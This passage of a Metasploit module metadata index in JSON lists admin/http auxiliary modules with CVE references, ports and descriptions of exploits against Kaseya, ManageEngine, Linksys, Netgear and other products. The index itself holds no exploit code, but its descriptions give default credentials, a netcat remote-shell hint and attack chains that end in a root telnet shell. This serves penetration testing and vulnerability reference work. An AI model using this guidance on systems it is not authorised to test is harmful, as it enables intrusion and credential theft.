"/modules/auxiliary/admin/http/joomla_registration_privesc.rb", - "is_install_path": true, - "ref_name": "admin/http/joomla_registration_privesc", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/kaseya_master_admin": { - "name": "Kaseya VSA Master Administrator Account Creation", - "fullname": "auxiliary/admin/http/kaseya_master_admin", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-09-23", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module abuses the setAccount page on Kaseya VSA between 7 and 9.1 to create a new\n Master Administrator account. Normally this page is only accessible via the localhost\n interface, but the application does nothing to prevent this apart from attempting to\n force a redirect. This module has been tested with Kaseya VSA v7.0.0.17, v8.0.0.10 and\n v9.0.0.3.", - "references": [ - "CVE-2015-6922", - "ZDI-15-448", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Kaseya/kaseya-vsa-vuln-2.txt", - "URL-https://seclists.org/bugtraq/2015/Sep/132" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/kaseya_master_admin.rb", - "is_install_path": true, - "ref_name": "admin/http/kaseya_master_admin", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/katello_satellite_priv_esc": { - "name": "Katello (Red Hat Satellite) users/update_roles Missing Authorization", - "fullname": "auxiliary/admin/http/katello_satellite_priv_esc", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-03-24", - "type": "auxiliary", - "author": [ - "Ramon de C Valle " - ], - "description": "This module exploits a missing authorization vulnerability in the\n \"update_roles\" action of \"users\" controller of Katello and Red Hat Satellite\n (Katello 1.5.0-14 and earlier) by changing the specified account to an\n administrator account.", - "references": [ - "CVE-2013-2143", - "CWE-862", - "URL-https://bugzilla.redhat.com/show_bug.cgi?id=970849" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb", - "is_install_path": true, - "ref_name": "admin/http/katello_satellite_priv_esc", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/limesurvey_file_download": { - "name": "Limesurvey Unauthenticated File Download", - "fullname": "auxiliary/admin/http/limesurvey_file_download", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-10-12", - "type": "auxiliary", - "author": [ - "Pichaya Morimoto", - "Christian Mehlmauer " - ], - "description": "This module exploits an unauthenticated file download vulnerability\n in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded\n as a ZIP and unzipped automatically, thus binary files can be downloaded.", - "references": [ - "URL-https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-lime-survey/", - "URL-https://www.limesurvey.org/blog/22-security/136-limesurvey-security-advisory-10-2015", - "URL-https://github.com/LimeSurvey/LimeSurvey/compare/2.06_plus_151014...2.06_plus_151016?w=1" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/limesurvey_file_download.rb", - "is_install_path": true, - "ref_name": "admin/http/limesurvey_file_download", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/linksys_e1500_e2500_exec": { - "name": "Linksys E1500/E2500 Remote Command Execution", - "fullname": "auxiliary/admin/http/linksys_e1500_e2500_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-02-05", - "type": "auxiliary", - "author": [ - "Michael Messner " - ], - "description": "Some Linksys Routers are vulnerable to an authenticated OS command injection.\n Default credentials for the web interface are admin/admin or admin/password. Since\n it is a blind os command injection vulnerability, there is no output for the\n executed command. A ping command against a controlled system for can be used for\n testing purposes.", - "references": [ - "OSVDB-89912", - "BID-57760", - "EDB-24475", - "URL-http://www.s3cur1ty.de/m1adv2013-004" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb", - "is_install_path": true, - "ref_name": "admin/http/linksys_e1500_e2500_exec", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/linksys_tmunblock_admin_reset_bof": { - "name": "Linksys WRT120N tmUnblock Stack Buffer Overflow", - "fullname": "auxiliary/admin/http/linksys_tmunblock_admin_reset_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-02-19", - "type": "auxiliary", - "author": [ - "Craig Heffner", - "Michael Messner " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in the WRT120N Linksys router\n to reset the password of the management interface temporarily to an empty value.\n This module has been tested successfully on a WRT120N device with firmware version\n 1.0.07.", - "references": [ - "EDB-31758", - "OSVDB-103521", - "URL-https://web.archive.org/web/20210424073058/http://www.devttys0.com/2014/02/wrt120n-fprintf-stack-overflow/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb", - "is_install_path": true, - "ref_name": "admin/http/linksys_tmunblock_admin_reset_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/linksys_wrt54gl_exec": { - "name": "Linksys WRT54GL Remote Command Execution", - "fullname": "auxiliary/admin/http/linksys_wrt54gl_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-01-18", - "type": "auxiliary", - "author": [ - "Michael Messner " - ], - "description": "Some Linksys Routers are vulnerable to OS Command injection.\n You will need credentials to the web interface to access the vulnerable part\n of the application.\n Default credentials are always a good starting point. admin/admin or admin\n and blank password could be a first try.\n Note: This is a blind OS command injection vulnerability. This means that\n you will not see any output of your command. Try a ping command to your\n local system and observe the packets with tcpdump (or equivalent) for a first test.\n\n Hint: To get a remote shell you could upload a netcat binary and exec it.\n WARNING: this module will overwrite network and DHCP configuration.", - "references": [ - "URL-http://www.s3cur1ty.de/m1adv2013-01", - "URL-http://www.s3cur1ty.de/attacking-linksys-wrt54gl", - "EDB-24202", - "BID-57459", - "OSVDB-89421" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb", - "is_install_path": true, - "ref_name": "admin/http/linksys_wrt54gl_exec", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/manage_engine_dc_create_admin": { - "name": "ManageEngine Desktop Central Administrator Account Creation", - "fullname": "auxiliary/admin/http/manage_engine_dc_create_admin", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-12-31", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits an administrator account creation vulnerability in Desktop Central\n from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in\n several versions of Desktop Central (including MSP) from v7 onwards.", - "references": [ - "CVE-2014-7862", - "OSVDB-116554", - "URL-https://seclists.org/fulldisclosure/2015/Jan/2", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_dc9_admin.txt" - ], - "platform": "", - "arch": "", - "rport": 8020, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-08 10:51:35 +0000", - "path": "/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb", - "is_install_path": true, - "ref_name": "admin/http/manage_engine_dc_create_admin", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/manageengine_dir_listing": { - "name": "ManageEngine Multiple Products Arbitrary Directory Listing", - "fullname": "auxiliary/admin/http/manageengine_dir_listing", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-01-28", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits a directory listing information disclosure vulnerability in the\n FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It\n makes a recursive listing, so it will list the whole drive if you ask it to list / in\n Linux or C:\\ in Windows. This vulnerability is unauthenticated on OpManager and\n Applications Manager, but authenticated in IT360. This module will attempt to login\n using the default credentials for the administrator and guest accounts; alternatively\n you can provide a pre-authenticated cookie or a username / password combo. For IT360\n targets enter the RPORT of the OpManager instance (usually 8300). This module has been\n tested on both Windows and Linux with several different versions. Windows paths have to\n be escaped with 4 backslashes on the command line. There is a companion module that\n allows for arbitrary file download. This vulnerability has been fixed in Applications\n Manager v11.9 b11912 and OpManager 11.6.", - "references": [ - "CVE-2014-7863", - "OSVDB-117696", - "URL-https://seclists.org/fulldisclosure/2015/Jan/114", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/manageengine_dir_listing.rb", - "is_install_path": true, - "ref_name": "admin/http/manageengine_dir_listing", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/manageengine_file_download": { - "name": "ManageEngine Multiple Products Arbitrary File Download", - "fullname": "auxiliary/admin/http/manageengine_file_download", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-01-28", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits an arbitrary file download vulnerability in the FailOverHelperServlet\n on ManageEngine OpManager, Applications Manager and IT360. This vulnerability is\n unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This\n module will attempt to login using the default credentials for the administrator and\n guest accounts; alternatively you can provide a pre-authenticated cookie or a username\n and password combo. For IT360 targets enter the RPORT of the OpManager instance (usually\n 8300). This module has been tested on both Windows and Linux with several different\n versions. Windows paths have to be escaped with 4 backslashes on the command line. There is\n a companion module that allows the recursive listing of any directory. This\n vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.", - "references": [ - "CVE-2014-7863", - "OSVDB-117695", - "URL-https://seclists.org/fulldisclosure/2015/Jan/114", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/manageengine_file_download.rb", - "is_install_path": true, - "ref_name": "admin/http/manageengine_file_download", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/manageengine_pmp_privesc": { - "name": "ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection", - "fullname": "auxiliary/admin/http/manageengine_pmp_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-11-08", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection\n vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate\n privileges and obtain Super Administrator access. A Super Administrator can then\n use his privileges to dump the whole password database in CSV format. PMP can use\n both MySQL and PostgreSQL databases but this module only exploits the latter as\n MySQL does not support stacked queries with Java. PostgreSQL is the default database\n in v6.8 and above, but older PMP versions can be upgraded and continue using MySQL,\n so a higher version does not guarantee exploitability. This module has been tested\n on v6.8 to v7.1 build 7104 on both Windows and Linux. The vulnerability is fixed in\n v7.1 build 7105 and above.", - "references": [ - "CVE-2014-8499", - "OSVDB-114485", - "URL-https://seclists.org/fulldisclosure/2014/Nov/18", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_pmp_privesc.txt" - ], - "platform": "", - "arch": "", - "rport": 7272, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb", - "is_install_path": true, - "ref_name": "admin/http/manageengine_pmp_privesc", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/mantisbt_password_reset": { - "name": "MantisBT password reset", - "fullname": "auxiliary/admin/http/mantisbt_password_reset", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-04-16", - "type": "auxiliary", - "author": [ - "John (hyp3rlinx) Page", - "Julien (jvoisin) Voisin" - ], - "description": "MantisBT before 1.3.10, 2.2.4, and 2.3.1 are vulnerable to unauthenticated password reset.", - "references": [ - "CVE-2017-7615", - "EDB-41890", - "URL-https://mantisbt.org/bugs/view.php?id=22690", - "URL-http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt" - ], - "platform": "Linux,Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/mantisbt_password_reset.rb", - "is_install_path": true, - "ref_name": "admin/http/mantisbt_password_reset", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/mutiny_frontend_read_delete": { - "name": "Mutiny 5 Arbitrary File Read and Delete", - "fullname": "auxiliary/admin/http/mutiny_frontend_read_delete", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-05-15", - "type": "auxiliary", - "author": [ - "juan vazquez " - ], - "description": "This module exploits the EditDocument servlet from the frontend on the Mutiny 5\n appliance. The EditDocument servlet provides file operations, such as copy and\n delete, which are affected by a directory traversal vulnerability. Because of this,\n any authenticated frontend user can read and delete arbitrary files from the system\n with root privileges. In order to exploit the vulnerability a valid user (any role)\n in the web frontend is required. The module has been tested successfully on the\n Mutiny 5.0-1.07 appliance.", - "references": [ - "CVE-2013-0136", - "US-CERT-VU-701572", - "URL-http://web.archive.org/web/20250114041839/https://www.rapid7.com/blog/post/2013/05/15/new-1day-exploits-mutiny-vulnerabilities/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb", - "is_install_path": true, - "ref_name": "admin/http/mutiny_frontend_read_delete", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Delete", - "description": "Delete arbitrary file" - }, - { - "name": "Read", - "description": "Read arbitrary file" - } - ] - }, - "auxiliary_admin/http/netflow_file_download": { - "name": "ManageEngine NetFlow Analyzer Arbitrary File Download", - "fullname": "auxiliary/admin/http/netflow_file_download", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-11-30", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits an arbitrary file download vulnerability in CSVServlet\n on ManageEngine NetFlow Analyzer. This module has been tested on both Windows\n and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you\n must escape the backslash with a backslash.", - "references": [ - "CVE-2014-5445", - "OSVDB-115340", - "URL-https://seclists.org/fulldisclosure/2014/Dec/9", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/netflow_file_download.rb", - "is_install_path": true, - "ref_name": "admin/http/netflow_file_download", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/netgear_auth_download": { - "name": "NETGEAR ProSafe Network Management System 300 Authenticated File Download", - "fullname": "auxiliary/admin/http/netgear_auth_download", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-02-04", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n The application has a file download vulnerability that can be exploited by an\n authenticated remote attacker to download any file in the system.\n This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13.", - "references": [ - "CVE-2016-1524", - "US-CERT-VU-777024", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt", - "URL-https://seclists.org/fulldisclosure/2016/Feb/30" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/netgear_auth_download.rb", - "is_install_path": true, - "ref_name": "admin/http/netgear_auth_download", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/netgear_pnpx_getsharefolderlist_auth_bypass": { - "name": "Netgear PNPX_GetShareFolderList Authentication Bypass", - "fullname": "auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-09-06", - "type": "auxiliary", - "author": [ - "Unknown", - "Grant Willcox" - ], - "description": "This module targets an authentication bypass vulnerability in the mini_http binary of several Netgear Routers\n running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The vulnerability allows\n unauthenticated attackers to reveal the password for the admin user that is used to log into the\n router's administrative portal, in plaintext.\n\n Once the password has been been obtained, the exploit enables telnet on the target router and then utiltizes\n the auxiliary/scanner/telnet/telnet_login module to log into the router using the stolen credentials of the\n admin user. This will result in the attacker obtaining a new telnet session as the \"root\" user.\n\n This vulnerability was discovered and exploited by an independent security researcher who reported it to SSD.", - "references": [ - "URL-https://kb.netgear.com/000063961/Security-Advisory-for-Authentication-Bypass-Vulnerability-on-the-D7000-and-Some-Routers-PSV-2021-0133", - "URL-https://ssd-disclosure.com/ssd-advisory-netgear-d7000-authentication-bypass/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb", - "is_install_path": true, - "ref_name": "admin/http/netgear_pnpx_getsharefolderlist_auth_bypass", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "config-changes", - "ioc-in-logs" - ], - "RelatedModules": [ - "exploit/linux/telnet/netgear_telnetenable" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/netgear_r6700_pass_reset": { - "name": "Netgear R6700v3 Unauthenticated LAN Admin Password Reset", - "fullname": "auxiliary/admin/http/netgear_r6700_pass_reset", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-06-15", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro ", - "Radek Domanski ", - "gwillcox-r7" - ], - "description": "This module targets ZDI-20-704 (aka CVE-2020-10924), a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd),\n on Netgear R6700v3 routers running firmware versions from V1.0.2.62 up to but not including V1.0.4.94, to reset\n the password for the 'admin' user back to its factory default of 'password'. Authentication is bypassed by\n using ZDI-20-703 (aka CVE-2020-10923), an authentication bypass that occurs when network adjacent\n computers send SOAPAction UPnP messages to a vulnerable Netgear R6700v3 router. Currently this module only\n supports exploiting Netgear R6700v3 routers running either the V1.0.0.4.82_10.0.57 or V1.0.0.4.84_10.0.58\n firmware, however support for other firmware versions may be added in the future.\n\n Once the password has been reset, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a\n special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can\n then log into this telnet server using the new password, and obtain a shell as the \"root\" user.\n\n These last two steps have to be done manually, as the authors did not reverse the communication with the web interface.\n It should be noted that successful exploitation will result in the upnpd binary crashing on the target router.\n As the upnpd binary will not restart until the router is rebooted, this means that attackers can only exploit\n this vulnerability once per reboot of the router.\n\n This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +\n Radek Domanski).", - "references": [ - "URL-https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md", - "URL-https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders", - "CVE-2020-10923", - "CVE-2020-10924", - "ZDI-20-703", - "ZDI-20-704" - ], - "platform": "", - "arch": "", - "rport": 5000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb", - "is_install_path": true, - "ref_name": "admin/http/netgear_r6700_pass_reset", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "config-changes" - ], - "Stability": [ - "crash-service-down" - ], - "Reliability": [], - "RelatedModules": [ - "exploit/linux/telnet/netgear_telnetenable" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/netgear_r7000_backup_cgi_heap_overflow_rce": { - "name": "Netgear R7000 backup.cgi Heap Overflow RCE", - "fullname": "auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-04-21", - "type": "auxiliary", - "author": [ - "colorlight2019", - "SSD Disclosure", - "Grant Willcox (tekwizz123)" - ], - "description": "This module exploits a heap buffer overflow in the genie.cgi?backup.cgi\n page of Netgear R7000 routers running firmware version 1.0.11.116.\n Successful exploitation results in unauthenticated attackers gaining\n code execution as the root user.\n\n The exploit utilizes these privileges to enable the telnet server\n which allows attackers to connect to the target and execute commands\n as the admin user from within a BusyBox shell. Users can connect to\n this telnet server by running the command \"telnet *target IP*\".", - "references": [ - "URL-https://ssd-disclosure.com/ssd-advisory-netgear-nighthawk-r7000-httpd-preauth-rce/", - "CVE-2021-31802" - ], - "platform": "Linux", - "arch": "armle", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce.rb", - "is_install_path": true, - "ref_name": "admin/http/netgear_r7000_backup_cgi_heap_overflow_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/netgear_soap_password_extractor": { - "name": "Netgear Unauthenticated SOAP Password Extractor", - "fullname": "auxiliary/admin/http/netgear_soap_password_extractor", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-02-11", - "type": "auxiliary", - "author": [ - "Peter Adkins ", - "Michael Messner ", - "h00die " - ], - "description": "This module exploits an authentication bypass vulnerability in different Netgear devices.\n It allows to extract the password for the remote management interface. This module has been\n tested on a Netgear WNDR3700v4 - V1.0.1.42, but other devices are reported as vulnerable:\n NetGear WNDR3700v4 - V1.0.0.4SH, NetGear WNDR3700v4 - V1.0.1.52, NetGear WNR2200 - V1.0.1.88,\n NetGear WNR2500 - V1.0.0.24, NetGear WNDR3700v2 - V1.0.1.14 (Tested by Paula Thomas),\n NetGear WNDR3700v1 - V1.0.16.98 (Tested by Michal Bartoszkiewicz),\n NetGear WNDR3700v1 - V1.0.7.98 (Tested by Michal Bartoszkiewicz),\n NetGear WNDR4300 - V1.0.1.60 (Tested by Ronny Lindner),\n NetGear R6300v2 - V1.0.3.8 (Tested by Robert Mueller),\n NetGear WNDR3300 - V1.0.45 (Tested by Robert Mueller),\n NetGear WNDR3800 - V1.0.0.48 (Tested by an Anonymous contributor),\n NetGear WNR1000v2 - V1.0.1.1 (Tested by Jimi Sebree),\n NetGear WNR1000v2 - V1.1.2.58 (Tested by Chris Boulton),\n NetGear WNR2000v3 - v1.1.2.10 (Tested by h00die)", - "references": [ - "BID-72640", - "OSVDB-118316", - "URL-https://github.com/darkarnium/secpub/tree/master/Vulnerabilities/NetGear/SOAPWNDR" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb", - "is_install_path": true, - "ref_name": "admin/http/netgear_soap_password_extractor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/netgear_wnr2000_pass_recovery": { - "name": "NETGEAR WNR2000v5 Administrator Password Recovery", - "fullname": "auxiliary/admin/http/netgear_wnr2000_pass_recovery", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-12-20", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "The NETGEAR WNR2000 router has a vulnerability in the way it handles password recovery.\n This vulnerability can be exploited by an unauthenticated attacker who is able to guess\n the value of a certain timestamp which is in the configuration of the router.\n Brute forcing the timestamp token might take a few minutes, a few hours, or days, but\n it is guaranteed that it can be bruteforced.\n This module works very reliably and it has been tested with the WNR2000v5, firmware versions\n 1.0.0.34 and 1.0.0.18. It should also work with the hardware revisions v4 and v3, but this\n has not been tested.", - "references": [ - "CVE-2016-10175", - "CVE-2016-10176", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt", - "URL-https://seclists.org/fulldisclosure/2016/Dec/72", - "URL-https://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb", - "is_install_path": true, - "ref_name": "admin/http/netgear_wnr2000_pass_recovery", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/nexpose_xxe_file_read": { - "name": "Nexpose XXE Arbitrary File Read", - "fullname": "auxiliary/admin/http/nexpose_xxe_file_read", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Brandon Perry ", - "Drazen 